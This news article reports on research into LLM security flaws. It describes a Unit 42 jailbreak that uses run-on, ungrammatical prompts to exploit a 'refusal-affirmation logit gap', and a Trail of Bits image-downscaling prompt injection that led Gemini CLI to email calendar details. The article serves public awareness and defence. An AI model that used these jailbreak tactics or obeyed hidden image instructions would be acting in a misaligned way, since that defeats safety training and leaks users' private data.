Connect with us

Science

Researchers Uncover Security Flaws in Large Language Models

Editorial

Published

on

Recent research has highlighted serious vulnerabilities in large language models (LLMs), revealing that they can be easily manipulated into disclosing sensitive information. Despite claims of advanced training and near-artificial general intelligence (AGI), these models often lack the human-like common sense needed to navigate complex situations. Researchers from multiple institutions have documented methods that exploit these weaknesses, indicating that security measures for AI systems are still inadequately developed.

A key finding suggests that LLMs can be tricked into revealing confidential information through poorly constructed prompts, such as run-on sentences without punctuation. David Shipley, a representative from Beauceron Security, stated, “The truth about many of the largest language models out there is that prompt security is a poorly designed fence with so many holes to patch that it’s a never-ending game of whack-a-mole.” He emphasized that inadequate security measures leave users vulnerable to harmful content.

Technical Vulnerabilities in Language Models

In their research, experts at Palo Alto Networks’ Unit 42 identified a “refusal-affirmation logit gap” that compromises LLMs’ ability to reject harmful queries. Typically, these models are fine-tuned to refuse dangerous requests, but the researchers found that this alignment does not fully eliminate the potential for harmful responses. Instead, attackers can exploit this gap, using strategies like bad grammar and run-on sentences to bypass internal safety protocols. This method demonstrated an impressive success rate of between 80% and 100% across various mainstream models, including Google’s Gemini and OpenAI’s latest open-source model, gpt-oss-20b.

The researchers explained, “Never let the sentence end — finish the jailbreak before a full stop and the safety model has far less opportunity to re-assert itself.” This tactic effectively exposes the limitations of relying solely on internal alignment to filter out toxic content.

Exploiting Image Processing Systems

Another significant vulnerability arises when users upload images to LLMs, often without realizing that this process could inadvertently leak sensitive data. Researchers from Trail of Bits conducted experiments showing that harmful instructions embedded in images can remain undetected at full resolution but become visible when scaled down. For instance, in a test involving the Google Gemini command-line interface (CLI), a hidden command was uncovered that instructed the model to check a calendar and send event details via email.

The method’s effectiveness against various applications, including Google Assistant and Genspark, raises concerns about the potential for widespread exploitation. Shipley pointed out that many of these security flaws have long been acknowledged yet remain unaddressed, suggesting that AI systems often treat security as an afterthought.

Adding to the concerns, a study by Tracebit revealed that malicious actors could gain unauthorized access to sensitive data through a combination of prompt injection and inadequate validation processes. The researchers noted that such vulnerabilities create significant risks that are difficult to detect.

Valence Howden, an advisory fellow at Info-Tech Research Group, highlighted that a lack of understanding regarding AI operations hampers the establishment of effective security measures. “It’s difficult to apply security controls effectively with AI; its complexity and dynamic nature make static security controls significantly less effective,” he said.

The research emphasizes that many AI models are predominantly trained in English, which can lead to contextual misunderstandings when different languages are used. This limitation further complicates security efforts, as existing systems are not designed to manage natural language as a potential threat vector.

Shipley concluded that the current state of AI security is precarious. He noted, “There’s so much bad stuffed into these models in the mad pursuit of ever-larger corpuses in exchange for hoped-for-performance increases that the only sane thing, cleaning up the dataset, is also the most impossible.”

The ongoing discoveries of vulnerabilities signal a pressing need for improved security measures in AI development. As researchers continue to unveil these flaws, the potential for real harm from compromised language models becomes increasingly apparent.

The team focuses on bringing trustworthy and up-to-date news from New Zealand. With a clear commitment to quality journalism, they cover what truly matters.

Trending

Copyright © All rights reserved. This website offers general news and educational content for informational purposes only. While we strive for accuracy, we do not guarantee the completeness or reliability of the information provided. The content should not be considered professional advice of any kind. Readers are encouraged to verify facts and consult relevant experts when necessary. We are not responsible for any loss or inconvenience resulting from the use of the information on this site.